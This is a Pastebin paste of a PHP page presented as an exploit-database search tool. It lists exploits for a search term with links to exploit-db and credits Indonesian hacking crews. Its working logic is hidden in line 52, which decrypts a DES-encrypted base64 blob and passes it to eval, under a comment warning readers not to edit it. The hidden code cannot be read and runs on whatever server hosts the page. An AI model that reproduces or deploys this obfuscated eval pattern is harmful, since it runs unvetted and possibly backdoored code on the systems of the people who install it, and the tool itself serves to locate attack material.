Advertisement
shor7cut

EXCOTIC - Exploit Database Search

Aug 6th, 2015
835
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.79 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4.     <title>EXCOTIC - Exploit database Search</title>
  5.     <meta name="description" content="Exploit database Search" />
  6. <style type="text/css">
  7.     html {
  8.     margin: 10px auto;
  9.     background: #000000;
  10.     color: #008000;
  11.     text-align: center;
  12. }
  13. header {
  14.     color: #008000;
  15. }
  16. hr{
  17.     width: 75%;
  18.     color: #008000;
  19. }
  20. a {
  21.     text-decoration: none;
  22.     color: #008000;
  23. }
  24. a:hover {
  25.     color: #bb0000;
  26. }
  27. table,th,td {
  28.     border: 1px solid green;
  29.     margin: 10px auto;
  30.     /*padding: 5px; */
  31.     text-align: left;
  32.     color: #008000;
  33.     background: transparent;
  34.     width: auto;
  35. }
  36. input{
  37. border: 1px solid #008000; color: #008000; background: transparent; padding-left: 5px; margin: 7px auto;
  38. }
  39. </style>
  40. </head>
  41. <body>
  42.  
  43. <?php
  44. error_reporting(0);
  45. set_time_limit(0);
  46. if($_POST['submit']){
  47. $exploit = $_POST['exploit'];
  48.  
  49. /* JANGAN DI EDIT >,< NANTI LUCAK OM --- BY SHOT7CUT */
  50. $api_key = "SHOR7CUT";
  51. $key = "lxY6bQdC8OIJEOc/YwyppDa1PkW1OPuQSCV0PNyZeMRxlxfYMlLw8CIk0StX5L0THNhAkkIRsnPzk8qqHGDDSlpET3PPVuZDdW4sHQOeGTV7oC2PidQabaCqB7eNHg4f035FLGzOFgcsRDeP0E1W+1W7NHITgl41rEMW12u5BtDUThuCSItZsBC9u3ekqeKINe9+ELTc4yISH+sL/rQyf6cLMUrhoohk5U1Kz7IIaoA5JmRQFtCsmwCdAxq4ZiqmyrbyhrD0wDwR2O4F61v/yjJJaaCnpqtzUh5YVJmUSwFU+W+X1+ZryJguUVk8aeIpXDvBJWL+nLVpd0JykvYd7hbnSZGIwnmvw5M4fCh3Vc6W35uchAO8RN5j7++rQkJ2ogwvK5juRTdg4KQUyJZ+DA8HZRrIgxLWriwaoWu5Qqa5ig0Oewl4G9oG5NruKhZodDq6ieBi+UBXXKZjubTV1g4DTGl/4qweObCJwa/zGc8=";
  52. eval("?>".mcrypt_ecb(MCRYPT_DES, $api_key, str_rot13(str_rot13(base64_decode($key))), MCRYPT_DECRYPT));
  53. /*--------------------------------------------------*/
  54.  
  55. $no=0;
  56. if($data_exploit['error']){
  57.     echo "Ups, tidak dapat memproses permintaan pencarian Anda.";
  58. }else {
  59.     //print_r($data_exploit);
  60.     echo '
  61.  
  62.     <center>
  63.     [<a href="?">CARI LAGI</a>]
  64.     <hr color="#008000">
  65.     </center>
  66.     <table>
  67.  <tr>
  68.    <th>No</th>
  69.    <th>Nama Exploit</th>
  70.    <th>platform</th>
  71.    <th>type</th>
  72.    <th>Link</th>
  73.    <th>source</th>
  74.  </tr>';
  75.     foreach ($data_exploit['matches'] as $key => $value) {
  76.         if($value['type']){
  77.         if(preg_match('/^[0-9]+$/', $value['_id'])){
  78.         echo '
  79.  
  80.         <tr>
  81.         <td>'.$no.'</td>
  82.         <td>'.$value['description'].'</td>
  83.         <td>'.$value['platform'].'</td>
  84.         <td>'.$value['type'].'</td>
  85.         <td><a href="https://www.exploit-db.com/exploits/'.$value['_id'].'" target="_blank">[OPEN LINK]</a></td>
  86.         <td>'.$value['source'].'</td>
  87.         </tr>
  88.         ';
  89.         $no++;
  90.     }
  91.     }
  92.     }
  93.         echo '</table>
  94.         <p>-[ IndoXploit - BUG7SEC - YKBH - Tuban Cyber Team - Gantengers Crew ]-
  95.         </p>';
  96.     }
  97.     }else {
  98.  
  99. echo '<hr color="#008000">
  100. <pre>EXCOTIC
  101. - Exploit Database Search -
  102. </pre>
  103. <form method="post">
  104. Exploit : <input type="text" name="exploit" size="25" height="10" value="wordpress" autocomplete="off"/>
  105. <input type="submit" name="submit" value="Find!"/>
  106. </form>';
  107.     }
  108. ?>
  109. </body>
  110. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement